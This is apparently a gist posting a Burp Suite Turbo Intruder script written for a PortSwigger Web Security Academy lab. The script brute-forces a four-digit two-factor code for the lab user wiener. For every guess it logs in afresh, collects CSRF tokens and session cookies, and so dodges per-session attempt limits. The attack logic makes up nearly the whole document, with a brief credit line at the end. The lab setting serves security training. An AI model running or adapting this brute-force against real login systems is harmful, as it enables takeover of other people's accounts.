
@rkhan99e
Created August 17, 2023 15:26
Burpsuite - Turbo Intruder Example
import re
import time
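# Parameters to configure.
# Patterns that capture the anti-CSRF token from a login form and the session
# id from a request or response. Raw strings keep the regex escapes (\w, \d)
# from being read as string escapes.
re_csrf = r'name="csrf" value="([\w\d]+)"'
re_session = r'session=([\w\d]+)'
# Lab instance the engine connects to; the same host name is repeated in the
# Host header of every request template in handleResponse.
url = 'https://0add0030040299378166d901002800a1.web-security-academy.net'
delay = 1  # seconds; only referenced by the commented-out sleep in queueRequests
max_concurrent = 5  # passed to the engine as concurrentConnections
max_thread = 10  # passed to the engine as requestsPerConnection
req_count = 20  # upper bound of the seeding loop in queueRequests
# Counter for the next security code to submit. handleResponse declares it
# global and reads it before ever assigning it, so it has to exist at module
# level; without this line the first read raises NameError.
iterable = 0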
def queueRequests(target, wordlists):
    """Build the shared request engine and queue the seed requests.

    Creates a RequestEngine against ``url`` and stores it in the global
    ``engine``, then queues the base request (``target.req``) with an empty
    payload ``req_count - 1`` times. Every later request is queued from
    handleResponse in reaction to a response.

    ``wordlists`` is accepted but not used.
    """
    global engine

    # Author's calibration note: keep the load low because the lab server does
    # not cope well with many parallel connections, and retune these values
    # for each server.
    # NOTE(review): the original comment also asks for one request per
    # connection, yet requestsPerConnection is taken from max_thread (10 on
    # this page) -- confirm which was intended.
    engine = RequestEngine(
        endpoint=url,
        concurrentConnections=max_concurrent,
        requestsPerConnection=max_thread,
    )

    # Seed requests: each response to one of these starts a chain in
    # handleResponse. The count matches xrange(1, req_count), i.e. one less
    # than req_count.
    seeds_left = req_count - 1
    while seeds_left > 0:
        print('1. GET /login Request')
        engine.queue(target.req, '')
        seeds_left -= 1
        # Staggering the seeds by ``delay`` seconds is left disabled:
        # time.sleep(delay)
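def _first_group(pattern, text):
    """Return group 1 of the first ``pattern`` match in ``text``, or None."""
    found = re.search(pattern, text)
    if found is None:
        return None
    return found.group(1)


def handleResponse(req, interesting):
    """Advance one login chain by a single step for each response received.

    The response text is tested against fixed markers in the order below and
    the first hit decides what is queued next:

    1. 302 to /my-account?id=wiener: the code was accepted; request the
       account page with the session taken from this response.
    2. 'Incorrect security code': add the response to the results table and
       start a new chain from the base request.
    3. The 4-digit code prompt: submit the current value of ``iterable``,
       zero-padded to four digits, then increment it.
    4. Redirect to /login2: request that page with the new session.
    5. The login form: post the lab credentials with the form's CSRF token.
    6. 200 containing 'Store credit: $100.00': add to the table, print 'Win'.

    Any other response is ignored. Always returns None. ``interesting`` is
    not used.

    Every guess is sent on a session obtained by a fresh login, so a limit on
    wrong codes that is kept per session never accumulates. Counting failed
    second-factor attempts per account across sessions, and throttling or
    locking on that count, is the control this traffic exercises; in server
    logs it shows up as repeated /login -> /login2 sequences for one user
    with a different mfa-code each time.

    Changes from the original: a response that lacks the expected session or
    CSRF value is skipped instead of raising AttributeError on a failed
    match, and nothing is queued once ``iterable`` is past 9999, because a
    five-digit value fits neither the form nor the fixed Content-Length.
    """
    global engine
    global iterable

    response = req.response

    if 'HTTP/1.1 302 Found' in response and 'Location: /my-account?id=wiener' in response:
        # Code accepted: follow the redirect with the session from this response.
        session = _first_group(re_session, response)
        if session is None:
            return None
        template = '''GET /my-account?id=wiener HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
        print('4. GET /my-account?id=wiener Request')
        engine.queue(template, session)
        return None

    if 'Incorrect security code' in response:
        # One attempt was used up; record it and begin a new chain.
        # NOTE(review): ``target`` is not a parameter of this function, so the
        # host environment has to expose it as a global -- confirm.
        table.add(req)
        print('1. GET /login Request')
        engine.queue(target.req, '')
        return None

    if 'Please enter your 4-digit security code' in response:
        if iterable > 9999:
            # The whole 4-digit space has been queued once; stop here.
            return None
        # The CSRF token comes from the page just received, the session id
        # from the request that fetched it.
        csrf = _first_group(re_csrf, response)
        session = _first_group(re_session, req.getRequest())
        if csrf is None or session is None:
            return None
        # NOTE(review): Content-Length is hard-coded in the template and is
        # only right for one token length -- confirm the engine corrects it.
        template = '''POST /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 51\r\n\r\ncsrf=%s&mfa-code=%s'''
        print('4. POST /login2 Request')
        engine.queue(template, [session, csrf, str(iterable).zfill(4)])
        iterable += 1
        print('Iterable: ' + str(iterable))
        return None

    if 'Location: /login2' in response:
        # Credentials were accepted; a new session id arrives with the
        # redirect and is used to fetch the page that carries the CSRF token.
        session = _first_group(re_session, response)
        if session is None:
            return None
        template = '''GET /login2 HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\n\r\n'''
        print('3. GET /login2 Request')
        engine.queue(template, session)
        return None

    if '<form class=login-form method=POST action="/login">' in response:
        # First page of a chain: post the username and password.
        session = _first_group(re_session, response)
        csrf = _first_group(re_csrf, response)
        if session is None or csrf is None:
            return None
        # NOTE(review): same hard-coded Content-Length caveat as for /login2.
        template = '''POST /login HTTP/1.1\r\nHost: 0add0030040299378166d901002800a1.web-security-academy.net\r\nCookie: session=%s\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 70\r\n\r\ncsrf=%s&username=wiener&password=peter'''
        print('2. POST /login Request')
        engine.queue(template, [session, csrf])
        return None

    if 'HTTP/1.1 200 OK' in response and 'Store credit: $100.00' in response:
        # The account page loaded, so the second factor was passed.
        table.add(req)
        print('Win')
        return None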
@rkhan99e

I give all credit to the following https://hackmag.com/security/burp-stepper-intruder/
